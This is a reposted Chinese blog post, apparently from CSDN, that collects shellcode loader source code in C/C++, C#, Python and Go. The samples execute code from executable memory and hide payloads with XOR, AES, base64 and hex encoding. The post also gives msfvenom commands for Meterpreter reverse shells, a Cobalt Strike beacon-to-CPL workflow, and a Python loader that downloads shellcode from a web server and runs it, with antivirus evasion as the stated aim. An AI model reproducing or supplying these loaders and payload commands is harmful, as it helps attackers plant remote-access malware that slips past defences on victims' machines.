转载-shellcode加载总结

已于 2024-06-28 17:08:49 修改
阅读量591 收藏 22
点赞数 11
文章标签: c语言
于 2024-06-28 09:20:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44201513/article/details/140033238
版权

转载-shellcode加载总结 · Uknow - Stay hungry Stay foolish

C/C++

源码加载

利用动态申请内存
#include <windows.h>
#include <stdio.h>
typedef void (_stdcall *CODE)();
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] ="";


void main()
{


    PVOID p = NULL;
    p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (p == NULL)
    {
        return;
    }
    memcpy(p, shellcode, sizeof(shellcode));
    
    CODE code = (CODE)p;
    code();
}
强制类型转换成函数指针
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] ="";

void main()
{
   ((void(WINAPI*)(void))&shellcode)();
}
嵌入式汇编呼叫shellcode
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";

void main()
{

	    __asm
    {
        
        mov eax, offset shellcode
        jmp eax

    }
}
伪指令
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";

void main()
{

	    __asm
    {
        
        mov eax, offset shellcode
        _emit 0xFF  
        _emit 0xE0

    }
}
xor加密
/*
Author: Arno0x0x, Twitter: @Arno0x0x
*/

#include "stdafx.h"
#include <windows.h>
#include <iostream>

int main(int argc, char **argv) {

	// Encrypted shellcode and cipher key obtained from shellcode_encoder.py
	char encryptedShellcode[] = "";
	char key[] = "uknowsec";
	char cipherType[] = "xor";

	// Char array to host the deciphered shellcode
	char shellcode[sizeof encryptedShellcode];	
	

	// XOR decoding stub using the key defined above must be the same as the encoding key
	int j = 0;
	for (int i = 0; i < sizeof encryptedShellcode; i++) {
		if (j == sizeof key - 1) j = 0;

		shellcode[i] = encryptedShellcode[i] ^ key[j];
		j++;
	}

	// Allocating memory with EXECUTE writes
	void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// Copying deciphered shellcode into memory as a function
	memcpy(exec, shellcode, sizeof shellcode);

	// Call the shellcode
	((void(*)())exec)();
}

加载器

C++.加载shellcode方式的payload到内存

https://github.com/clinicallyinane/shellcode_launcher/

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -e x86/shikata_ga_nai -i 5 -f raw > test.c

shellcode 加载

shellcode_launcher.exe -i test.c

C以十六进制的方式执行shellcode

https://github.com/DimopoulosElias/SimpleShellcodeInjector

生成shellcode

msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=443 -f c -o msf.txt


cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

加载shellcode

ssi.exe shellcode

Csharp

源码加载

直接加载
using System;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
    class Program
    {
        static void Main(string[] args)
        {
            // native function’s compiled code
            // generated with metasploit
            byte[] shellcode = new byte[333] {
            
            };
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
            MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            }
                    private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
            [DllImport("kernel32")]
                    private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
            [DllImport("kernel32")]
                    private static extern bool VirtualFree(IntPtr lpAddress,
            UInt32 dwSize, UInt32 dwFreeType);
            [DllImport("kernel32")]
                    private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
            );
            [DllImport("kernel32")]
                    private static extern bool CloseHandle(IntPtr handle);
            [DllImport("kernel32")]
                    private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );
            [DllImport("kernel32")]
                    private static extern IntPtr GetModuleHandle(
            string moduleName
            );
            [DllImport("kernel32")]
                    private static extern UInt32 GetProcAddress(
            IntPtr hModule,
            string procName
            );
            [DllImport("kernel32")]
                    private static extern UInt32 LoadLibrary(
            string lpFileName
            );
            [DllImport("kernel32")]
                    private static extern UInt32 GetLastError();
      }
}

using System;
using System.Threading;
using System.Runtime.InteropServices;
namespace MSFWrapper
{
    public class Program
    {
        public Program()
        {
           RunMSF();
        }
        public static void RunMSF()
        {
            byte[] MsfPayload = {
            //Paste your Payload here
        };
            IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
            Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
            CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
            Thread.Sleep(2000);
        }
        public static void Main()
        {
        }
        [DllImport("kernel32.dll")]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    }
}

保存代码后,修改该工程的属性,将输出类型改为“Windows 应用程序”,启动对象改为“MSFWrapper.Program”并保存。

aes加密
/*
Author: Arno0x0x, Twitter: @Arno0x0x

How to compile:
===============
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:encryptedShellcodeWrapper_aes.exe encryptedShellcodeWrapper_aes.cs

*/

using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;

namespace RunShellCode
{
    static class Program
    {
        //==============================================================================
        // CRYPTO FUNCTIONS
        //==============================================================================
        private static T[] SubArray<T>(this T[] data, int index, int length)
        {
            T[] result = new T[length];
            Array.Copy(data, index, result, 0, length);
            return result;
        }

        private static byte[] xor(byte[] cipher, byte[] key) {
            byte[] decrypted = new byte[cipher.Length];

            for(int i = 0; i < cipher.Length; i++) {
                decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]);
            }

            return decrypted;
        }

        //--------------------------------------------------------------------------------------------------
        // Decrypts the given a plaintext message byte array with a given 128 bits key
        // Returns the unencrypted message
        //--------------------------------------------------------------------------------------------------
        private static byte[] aesDecrypt(byte[] cipher, byte[] key)
        {
            var IV = cipher.SubArray(0, 16);
            var encryptedMessage = cipher.SubArray(16, cipher.Length - 16);

            // Create an AesManaged object with the specified key and IV.
            using (AesManaged aes = new AesManaged())
            {
                aes.Padding = PaddingMode.PKCS7;
                aes.KeySize = 128;
                aes.Key = key;
                aes.IV = IV;

                using (MemoryStream ms = new MemoryStream())
                {
                    using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(encryptedMessage, 0, encryptedMessage.Length);
                    }

                    return ms.ToArray();
                }
            }
        }

        //==============================================================================
        // MAIN FUNCTION
        //==============================================================================
        static void Main()
        {
            byte[] encryptedShellcode = new byte[] { };
            string key = "Nv78rga+vzeTO+acx4EXCw==";
            string cipherType = "aes";


            byte[] shellcode = null;

            //--------------------------------------------------------------
            // Decrypt the shellcode
            if (cipherType == "xor") {
                shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));
            }
            else if (cipherType == "aes") {
                shellcode = aesDecrypt(encryptedShellcode, Convert.FromBase64String(key));
            }
                        
            //--------------------------------------------------------------        	
            // Copy decrypted shellcode to memory
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // Prepare data
            IntPtr pinfo = IntPtr.Zero;

            // Invoke the shellcode
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(
            UInt32 lpStartAddr,
            UInt32 size,
            UInt32 flAllocationType,
            UInt32 flProtect
        );

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
        );

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
        );
    }
}
xor加密
/*
Author: Arno0x0x, Twitter: @Arno0x0x

How to compile:
===============
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:encryptedShellcodeWrapper_xor.exe encryptedShellcodeWrapper_xor.cs

*/

using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;

namespace RunShellCode
{
    static class Program
    {
        //==============================================================================
        // CRYPTO FUNCTIONS
        //==============================================================================
        private static T[] SubArray<T>(this T[] data, int index, int length)
        {
            T[] result = new T[length];
            Array.Copy(data, index, result, 0, length);
            return result;
        }

        private static byte[] xor(byte[] cipher, byte[] key) {
            byte[] decrypted = new byte[cipher.Length];

            for(int i = 0; i < cipher.Length; i++) {
                decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]);
            }

            return decrypted;
        }

        //--------------------------------------------------------------------------------------------------
        // Decrypts the given a plaintext message byte array with a given 128 bits key
        // Returns the unencrypted message
        //--------------------------------------------------------------------------------------------------
        private static byte[] aesDecrypt(byte[] cipher, byte[] key)
        {
            var IV = cipher.SubArray(0, 16);
            var encryptedMessage = cipher.SubArray(16, cipher.Length - 16);

            // Create an AesManaged object with the specified key and IV.
            using (AesManaged aes = new AesManaged())
            {
                aes.Padding = PaddingMode.PKCS7;
                aes.KeySize = 128;
                aes.Key = key;
                aes.IV = IV;

                using (MemoryStream ms = new MemoryStream())
                {
                    using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(encryptedMessage, 0, encryptedMessage.Length);
                    }

                    return ms.ToArray();
                }
            }
        }

        //==============================================================================
        // MAIN FUNCTION
        //==============================================================================
        static void Main()
        {
            byte[] encryptedShellcode = new byte[] { };
            string key = "uknowsec";
            string cipherType = "xor";


            byte[] shellcode = null;

            //--------------------------------------------------------------
            // Decrypt the shellcode
            if (cipherType == "xor") {
                shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));
            }
            else if (cipherType == "aes") {
                shellcode = aesDecrypt(encryptedShellcode, Convert.FromBase64String(key));
            }
                        
            //--------------------------------------------------------------        	
            // Copy decrypted shellcode to memory
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // Prepare data
            IntPtr pinfo = IntPtr.Zero;

            // Invoke the shellcode
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(
            UInt32 lpStartAddr,
            UInt32 size,
            UInt32 flAllocationType,
            UInt32 flProtect
        );

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
        );

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
        );
    }
}

从资源里加载shelllcode

https://github.com/rvrsh3ll/CPLResourceRunner

用Cobalt Strike 生成shellcode

Attacks -> Packages -> Windows Executable (s) -> Output => RAW (x86)

用ConvertShellcode.py将生成的 beacon.bin转换成shellcode.txt

然后再转换成base64编码。

root@kali:~/Desktop# python ConvertShellcode.py beacon.bin 
Shellcode written to shellcode.txt
root@kali:~/Desktop# cat shellcode.txt |sed 's/[, ]//g; s/0x//g;' |tr -d '\n' |xxd -p -r |gzip -c |base64 > b64shellcode.txt

把生成的base64编码的shellcode复制到项目资源Resources.txt里

编译生成dll。

copy CPLResourceRunner.dll to RunMe.cpl

三好学生-CPL文件利用介绍

Python

源码加载

import urllib2
import ctypes
import base64

# 从我们的web服务器上下载shellcode
url = "http://rinige.com/shellcode.bin"
response = urllib2.urlopen(url)
# base64 解码 shellcode
shellcode = base64.b64decode(response.read())
# 申请内存空间
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
# 创建 shellcode 的函数指针
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE¬
(ctypes.c_void_p))
# 执行 shellcode
shellcode_func()

#!/usr/bin/python
import ctypes

shellcode = bytearray("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b")

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
 
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
 
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

PyInstaller将py转为exe

pyinstaller同样可以将.py程序打包成windows下可以执行的exe文件。
pyinstaller依赖于pywin32,在使用pyinstaller之前,应先安装pywin32

pywin32下载后,点击下一步安装即可
Python for Windows Extensions - Browse /pywin32 at SourceForge.net
pyinstaller 下载后,解压,不用安装,即可使用
https://github.com/pyinstaller/pyinstaller/releases

python pyinstaller -F -w pyshellcode.py

生成的exe文件3MB。

xor加密
#!/usr/bin/python
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
#
# You can create a windows executable: pyinstaller --onefile --noconsole multibyteEncodedShellcode.py
from Crypto.Cipher import AES
from ctypes import *
import base64

#======================================================================================================
#											CRYPTO FUNCTIONS
#======================================================================================================

#------------------------------------------------------------------------
# data as a bytearray
# key as a string
def xor(data, key):
	l = len(key)
	keyAsInt = map(ord, key)
	return bytes(bytearray((
	    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
	)))

#------------------------------------------------------------------------
def unpad(s):
	"""PKCS7 padding removal"""
	return s[:-ord(s[len(s)-1:])]

#------------------------------------------------------------------------
def aesDecrypt(cipherText, key):
	"""Decrypt data with the provided key"""

	# Initialization Vector is in the first 16 bytes
	iv = cipherText[:AES.block_size]

	cipher = AES.new(key, AES.MODE_CBC, iv)
	return unpad(cipher.decrypt(cipherText[AES.block_size:]))

#======================================================================================================
#											MAIN FUNCTION
#======================================================================================================
if __name__ == '__main__':

	encryptedShellcode = ("")
	key = "uknowsec"
	cipherType = "xor"

	# Decrypt the shellcode
	if cipherType == 'xor':
		shellcode = xor(bytearray(encryptedShellcode), key)
	elif cipherType == 'aes':
		key = base64.b64decode(key)
		shellcode = aesDecrypt(encryptedShellcode, key)
	else:
		print "[ERROR] Unknown cipher type"

	# Copy the shellcode to memory and invoke it
	memory_with_shell = create_string_buffer(shellcode, len(shellcode))
	shell = cast(memory_with_shell,CFUNCTYPE(c_void_p))
	shell()
aes加密
#!/usr/bin/python
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
#
# You can create a windows executable: pyinstaller --onefile --noconsole multibyteEncodedShellcode.py
from Crypto.Cipher import AES
from ctypes import *
import base64

#======================================================================================================
#											CRYPTO FUNCTIONS
#======================================================================================================

#------------------------------------------------------------------------
# data as a bytearray
# key as a string
def xor(data, key):
	l = len(key)
	keyAsInt = map(ord, key)
	return bytes(bytearray((
	    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
	)))

#------------------------------------------------------------------------
def unpad(s):
	"""PKCS7 padding removal"""
	return s[:-ord(s[len(s)-1:])]

#------------------------------------------------------------------------
def aesDecrypt(cipherText, key):
	"""Decrypt data with the provided key"""

	# Initialization Vector is in the first 16 bytes
	iv = cipherText[:AES.block_size]

	cipher = AES.new(key, AES.MODE_CBC, iv)
	return unpad(cipher.decrypt(cipherText[AES.block_size:]))

#======================================================================================================
#											MAIN FUNCTION
#======================================================================================================
if __name__ == '__main__':

	encryptedShellcode = ("")
	key = "Nv78rga+vzeTO+acx4EXCw=="
	cipherType = "aes"

	# Decrypt the shellcode
	if cipherType == 'xor':
		shellcode = xor(bytearray(encryptedShellcode), key)
	elif cipherType == 'aes':
		key = base64.b64decode(key)
		shellcode = aesDecrypt(encryptedShellcode, key)
	else:
		print "[ERROR] Unknown cipher type"

	# Copy the shellcode to memory and invoke it
	memory_with_shell = create_string_buffer(shellcode, len(shellcode))
	shell = cast(memory_with_shell,CFUNCTYPE(c_void_p))
	shell()
base64加密
import ctypes
import base64

encode_shellcode = ""

shellcode = base64.b64decode(encode_shellcode)

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

加载器

Python免杀ShellCode加载器(Cobaltstrike/Metasploit)

HEX加密
#scrun by k8gege
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
shellcode=bytearray(sys.argv[1].decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
  
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
  
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
  
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
base64加密
#scrun by k8gege
import ctypes
import sys
import base64
#calc.exe
#REJDM0Q5NzQyNEY0QkVFODVBMjcxMzVGMzFDOUIxMzMzMTc3MTc4M0M3MDQwMzlGNDlDNUU2QTM4NjgwMDk1QjU3RjM4MEJFNjYyMUY2Q0JEQkY1N0M5OUQ3N0VEMDA5NjNGMkZEM0VDNEI5REI3MUQ1MEZFNEREMTUxMTk4MUY0QUYxQTFEMDlGRjBFNjBDNkZBMEJGNUJDMjU1Q0IxOURGNTQxQjE2NUYyRjFFRTgxNDg1MjEzODg0OTI2QUEwQUVGRDRBRDE2MzFFQjY5ODA4RDU0QzFCRDkyN0FDMkEyNUVCOTM4M0E4RjVENDIzNTM4MDJFNTBFRTkzRjQyQjM0MTFFOThCQkY4MUM5MkExMzU3OTkyMEQ4MTNDNTI0REZGMDdENTA1NEY3NTFEMTJFREM3NUJBRjU3RDJGNjY1QjgxMkZDRTA0MjczQkZDNTE1MTY2NkFBN0QzMUNEM0E3RUIxRTczQzBEQTk1MUM5N0UyN0Y1OTY3QTkyMkNCRTA3NEI3NEU2RDg3NkQ4Qzg4MDQ4NDZDNkYxNEVENjkyQjkyMUQwMzI0NzcyMkIwNDU1MjQxNTdENjNFQThGMjVFQTRCNA==
shellcode=bytearray(base64.b64decode(sys.argv[1]).decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
  
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
  
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
  
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

Go

内联C加载

package main

import "C"
import "unsafe"

func main() {
    buf := ""
    buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
    ...省略...
    buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
    // at your call site, you can send the shellcode directly to the C
    // function by converting it to a pointer of the correct type.
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}

加载器

https://github.com/brimstone/go-shellcode

生成hex格式的shellcode

msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444

加载器进行加载

c:\windows\temp>sc.exe shellcode
weixin_44201513
关注
Rust免杀 Shellcode加载与混淆
stopluox的博客
09-19 213
下面是实现AES-CFB加解密的代码,在加密的函数中最终返回的是Hex编码后的字符串,而解密函数最终返回的是Vec数组,同样是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。下面是实现RC4加解密的代码,在加密的函数中最终返回的是Base64编码后的字符串,而解密函数最终返回的是Vec数组,这是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode
《ODAY安全:软件漏洞分析技术》学习心得-----shellcode的一点小小的思考
weixin_30580943的博客
07-08 97
I will Make Impossible To I'm possible                     -----------LittleHann 看了2个多星期。终于把0DAY这本书给看完了,自己动手将书上的实验一个一个实现的感觉很不错,在学习的过程中,也增加了自己的信心。 这里希望做一个小小的总结,不是想说明自己有多牛逼,只是觉得学习应该是一个常思考,常总结的过程,分...
基于C++的shellcode及植入目标程序设计 课程报告+代码及exe可执行文件
毕业作品网站
05-15 603
目录 一.程序模块划分 1 二.主要模块描述 1 2.1 Shellcode 的生成 1 2.2 infect.cpp 简介 5 SetBytes 用于向文件指定位置覆盖写入 5 GetBytes 用于读取文件指定位置内容 5 获得 Dos 头中的 e_lfanew,即 PE 头的 RVA 6 三.传染模块的设计与实现 6 验证 PE 文件 8 2.获取 PE 头位置 9 四.PE 文件格式简述 10 Dos 头 10 PE header 11 SECTION TABLE 节
手工给程序插入 ShellCode
CSDN
11-04 1万+
PE格式是 Windows下最常用的可执行文件格式,理解PE文件格式不仅可以了解操作系统的加载流程,还可以更好的理解操作系统对进程和内存相关的管理知识,而有些技术必须建立在了解PE文件格式的基础上,如文件加密与解密,病毒分析,外挂技术等,本次实验的目标是手工修改或增加节区,并给特定可执行程序插入一段ShellCode代码,实现程序运行自动反弹一个Shell会话。 VA地址与FOA地址互转 首先我...
shell 脚本读取文件内容并输出--问题总结(编码问题)
热门推荐
11-15 3万+
版权声明:本文为博主原创文章,转载请注明CSDN博客源地址!共同学习,一起进步~  https://blog.csdn.net/qq_29473881/article/details/84101403 shell 脚本读取文件内容并输出--问题总结shell脚本读取文件主要介绍三种方式: 第一种: #/bin/bash while read line do echo $lin...
windows shellcode 总结
weixin_34267123的博客
12-03 247
说到shellcode可能都有些迷茫,不知它是什么东西,可能觉得也很神秘,对于它的专业解释也很少有人提及,今天我们就从以下几个方面来对windows下的shellcode做一个全剖析: 1. shellcode的发展历史以及定义 2. 现今常见的windows下的shellcode种类 3. 编写shellcode流程 4. shellocode举例 5、shell...
ShellCode入门(提取ShellCode
05-16 535
什么是ShellCode: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcodeShellcode通常是以机器码形式编写的,所以我们要学习硬编码。 char shellcode[] = ...
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1421
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
Java学习---面试基础知识点总结
weixin_30563319的博客
08-30 863
Java中sleep和wait的区别① 这两个方法来自不同的类分别是,sleep来自Thread类,和wait来自Object类。 sleep是Thread的静态类方法,谁调用的谁去睡觉,即使在a线程里调用b的sleep方法,实际上还是a去睡觉,要让b线程睡觉要在b的代码中调用sleep。 ② 锁: 最主要是sleep方法没有释放锁,而wait方法释放了锁,使得其他线程可以使...
[系统安全] 十七.Windows PE病毒概念、分类及感染方式详解
杨秀璋的专栏
02-01 1万+
作者前文介绍了PE文件格式,熟悉各种PE编辑查看工具,针对目标EXE程序新增对话框等;这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了《软件安全》视频、安全网站和参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
一些不错的网页
墨鱼菜鸡
12-06 2410
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
C语言刷力扣】3271.哈希分割字符串
2301_76779875的博客
09-23 226
C语言刷力扣】3271.哈希分割字符串
让-Flutter-在鸿蒙系统上跑起来,目录:鸿蒙系统适配;渲染流程打通;Flutter在鸿蒙系统上的移植
最新发布
09-29
鸿蒙----目录: 1、鸿蒙系统适配 2、渲染流程打通 3、Flutter在鸿蒙系统上的移植
【PFJSP问题】基于matlab灰狼算法GWO求解置换流水车间调度问题PFSP【含Matlab源码 7899期】.mp4
09-28
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
基于TypeScript和Vue的日历展示与日程条创建设计源码
09-28
